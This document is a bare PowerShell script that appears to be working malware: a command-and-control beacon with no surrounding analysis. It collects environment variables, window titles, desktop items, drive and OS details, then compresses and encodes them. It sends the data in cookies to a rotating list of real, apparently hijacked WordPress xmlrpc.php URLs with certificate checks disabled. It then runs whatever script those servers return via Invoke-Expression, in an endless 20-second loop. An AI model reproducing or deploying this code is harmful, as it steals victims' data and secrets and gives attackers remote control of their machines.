function Invoke-ObfuscatedRequest($url) {
    $cookieName = "486865D9C4"

    # Function to compress and Base64 encode data
    function Compress-Base64EncodedData($data) {
        $memoryStream = [System.IO.MemoryStream]::new()
        $gzipStream = [System.IO.Compression.GZipStream]::new($memoryStream, [System.IO.Compression.CompressionMode]::Compress)
        $streamWriter = [System.IO.StreamWriter]::new($gzipStream)
        $streamWriter.Write([String]::Join("|!", $data))
        $streamWriter.Close()
        [System.Convert]::ToBase64String($memoryStream.ToArray())
    }

    # Collect environment variables
    $envData = Compress-Base64EncodedData((Get-ChildItem env: | Where-Object { $_.Value.Length -lt 100 } | ForEach-Object { "$($_.Name)^$($_.Value)" }) + ("OSWMI^" + (Get-WmiObject Win32_OperatingSystem).Caption))

    # Collect unique GPS data
    $gpsData = Compress-Base64EncodedData(Get-WmiObject -Class Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 } | Select-Object -ExpandProperty DeviceID)

    # Collect window title data
    $windowData = Compress-Base64EncodedData(Get-Process | Where-Object { $_.MainWindowTitle } | ForEach-Object { "$($_.Name)^$($_.MainWindowTitle)" })

    # Collect system folders and files data
    $fileSystemData = Compress-Base64EncodedData(((New-Object -ComObject Shell.Application).Namespace(0)).Items() | ForEach-Object {
        if ($_.IsLink) { "0$($_.Name)" }
        elseif ($_.IsFolder) { "1$($_.Name)" }
        elseif ($_.IsFileSystem) { "2$([IO.Path]::GetFileName($_.Path))" }
        else { "3$($_.Name)" }
    })

    # Collect disk space information
    $diskSpaceData = Compress-Base64EncodedData(Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Free -gt 50000 } | ForEach-Object { "$($_.Name)^$($_.Used)" })

    # Set the security protocol and certificate validation callback
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
    [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }

    # Create web request
    $webRequest = [System.Net.WebRequest]::Create($url)
    $webRequest.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
    $webRequest.KeepAlive = $false
    $webRequest.Headers.Add("Cookie: $cookieName=$envData; $cookieName`1=$gpsData; $cookieName`2=$windowData; $cookieName`3=$fileSystemData; $cookieName`4=$diskSpaceData")

    # Get response from the web request
    $responseReader = New-Object System.IO.StreamReader($webRequest.GetResponse().GetResponseStream())
    $responseBody = $responseReader.ReadToEnd() -split $cookieName

    # Execute the response script if the expected data is received
    if ($responseBody.Count -eq 3) {
        Invoke-Expression ($responseBody[1] -replace "\^", "")
    }
}

# Infinite loop to randomly select a URL and invoke the function
while ($true) {
    try {
        $url = @(
            "https://ifthenpay.com/xmlrpc.php",
            "https://curlytales.com/xmlrpc.php",
            "https://customkiosks.co.uk/xmlrpc.php",
            "https://hommad.ru/xmlrpc.php",
            "https://fujitsu-airco.be/xmlrpc.php",
            "https://thinksaltlakecity.com/xmlrpc.php",
            "https://pornnudex.com/xmlrpc.php",
            "http://arce-ingenieria.com/wordpress/xmlrpc.php",
            "https://gatoro.co/xmlrpc.php",
            "https://indiarag.com/xmlrpc.php"
        ) | Get-Random

        # Invoke the function with a randomly chosen URL
        Invoke-ObfuscatedRequest $url
    } catch {
        # In case of any error, catch and continue the loop
        Write-Error "An error occurred: $_"
    }
    
    # Sleep for 20 seconds before retrying
    Start-Sleep -Seconds 20
}


